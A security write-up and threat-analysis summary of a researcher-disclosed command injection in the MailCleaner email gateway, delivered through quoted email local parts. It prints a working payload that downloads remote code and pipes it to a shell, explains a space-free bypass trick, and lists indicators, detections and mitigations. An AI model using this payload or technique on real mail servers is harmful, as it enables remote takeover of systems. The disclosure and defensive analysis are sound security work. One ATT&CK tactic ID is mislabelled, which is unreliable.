Full Report
MailCleaner is an email filtering service. An email address has two parts: the local and the domain, which are separated by an @ symbol. The domain part typically contains letters, numbers, hyphens and periods. The local part is more-so up to interpretation though. Typically, these allow for A-Za-z0-9!#$%&'*+-/=?^_`{|}~. However, when using a double quote on the local part, it becomes more lenient, according to the RFC. Hence, this can allow for weird characters: "(),:;@[\. By putting it in quotes, many systems will parse it differently. New characters are allowed or username splitting for commas. Why does this all matter? One mail server may understand an email differently than other implementations. Hence, we may be able to trick a system to do unintended things. Sub addressing on emails allows them to extend the basic email address into something more using the + sign. This allows for easy filtering and it's super nice. It's interesting because information after the plus may be ignored or dropped. While looking into MailCleaner, they noticed a call to system for cleaning up file entries. The domain_entry variable on the call came from a file path glob. By chance, the emails were being added into files! This is awesome; we now have a command injection point. In particular, using the double quotes gives us bad characters for command injection. There is a problem though: this code was only hittable by a malicious recipient address with a high spam score. This means that both MailCleaner and itself and the target mail server had to find the email as valid to hit this code. Obviously, the capability to register an arbitrary mailbox was too big of an ask. They decided to target Gmail and Outlook mail providers. They decided to use the sub-addresses functionality in order to exploit this. Sadly, neither of them were compliant to the specification and didn't allow simple command injection allows, which gave them the restricted set of characters +&|`${}#*. In this, there is no space character and everything was lower cased, preventing the usage of ENV variables. In the Dash documentation, there is a feature called parameter expansion. This provides substring functionality. The idea was to extract a space from another command and use that, which then stores the data into an environment variable called a. After executing a command that ended in a particular fashion, we could get those characters. Then, ${a##*d} would return the ending, including a space! The final payload ends up being a=`df|tac`&&curl${a##*d}.modzero.com|sh, where the space is for the spot between the items in curl. They had created a reverse shell that was completely compliant to the RFC, without spaces. That's pretty amazing! As a plus, they got a stored XSS on the email address on the senders email via the extra double quoted characters.
Analysis Summary
# Tool/Technique: RFC-Compliant Email Command Injection (MailCleaner Exploitation)
## Overview
This technique involves exploiting a Command Injection vulnerability in the MailCleaner email filtering gateway. By leveraging RFC 5322/6532 compliance (specifically double-quoted local parts and sub-addressing), an attacker can bypass input validation and deliver a malicious payload through an email address. This payload triggers an unauthenticated Remote Code Execution (RCE) when the mail server processes high-spam-score emails and performs file cleanup operations using unsanitized file paths.
## Technical Details
- **Type:** Technique (Exploit / Command Injection)
- **Platform:** Linux-based MailCleaner instances (filtering gateway)
- **Capabilities:** Unauthenticated Remote Code Execution, Stored Cross-Site Scripting (XSS), bypass of character restrictions.
- **First Seen:** 2023 (Published by modzero)
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566 - Phishing
- **TA0002 - Execution**
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- T1203 - Exploitation for Client Execution
- **TA0005 - Defense Evasion**
- T1211 - Exploitation for Defense Evasion
- **TA0001 - Persistence**
- T1133 - External Remote Services
## Functionality
### Core Capabilities
- **RFC-Compliant Payload Delivery:** Uses double quotes in the local part of an email address (e.g., `"payload"@domain.com`) to include characters usually forbidden by mail parsers (`,:;@[\`).
- **Command Injection via Globbing:** Exploits a `system()` call in MailCleaner that uses a file path glob containing the internal `domain_entry` variable, which is populated by the recipient's email address.
- **Space-less Shell Execution:** Utilizes Dash/Shell parameter expansion to bypass the lack of whitespace characters in many mail provider implementations.
### Advanced Features
- **Substring Parameter Expansion:** Uses `${variable##*pattern}` logic to extract spaces from the output of standard system commands (like `df`) to reconstruct a functional command line (e.g., `curl[...] |sh`).
- **Stored XSS:** The same malformed email address used for RCE can trigger a stored Cross-Site Scripting vulnerability in the MailCleaner management interface when the administrator views the logs or sender details.
## Indicators of Compromise
- **File Names:** Files within MailCleaner spool or quarantine directories containing unusual characters like `&`, `|`, or `` ` ``.
- **Network Indicators:**
- `modzero[.]com` (Used in the proof of concept)
- DNS queries for external domains originating from the MailCleaner appliance.
- **Behavioral Indicators:**
- `MailCleaner` processes (specifically periodic cleanup scripts) spawning unexpected child processes like `curl`, `sh`, or `tac`.
- Errors in mail logs related to "double quote" parsing or invalid local parts.
## Associated Threat Actors
- No specific threat groups are currently associated with this exploit; it was discovered and disclosed by security researchers at **modzero**.
## Detection Methods
- **Signature-based detection:** Scanning mail logs for specific patterns in the recipient field: `"+&|[...]"@`.
- **Behavioral detection:** Monitoring for the execution of `system()` or `exec()` calls within mail filtering scripts where the argument contains characters such as `${`, `}`, and `&`.
- **Log Analysis:** Identifying "high spam score" entries in MailCleaner that contain complex shell metacharacters in the local part of the address.
## Mitigation Strategies
- **Patching:** Apply updates provided by MailCleaner to address the unsanitized `system()` calls.
- **Input Validation:** Implement strict sanitization on any variable derived from an email address before passing it to shell-executing functions.
- **Principle of Least Privilege:** Ensure that mail processing and cleanup scripts run with the minimum necessary permissions to prevent full system compromise.
- **WAF/Email Gateway Policy:** Block or quarantine emails where the local part contains suspicious shell metacharacters, even if enclosed in double quotes.
## Related Tools/Techniques
- **Sub-addressing (Plus Addressing):** Using the `+` sign to create unique email aliases.
- **Blind Command Injection:** This technique is often used when command output is not directly visible to the attacker.
- **Living off the Land (LotL):** Using built-in shell features (parameter expansion) to bypass security controls.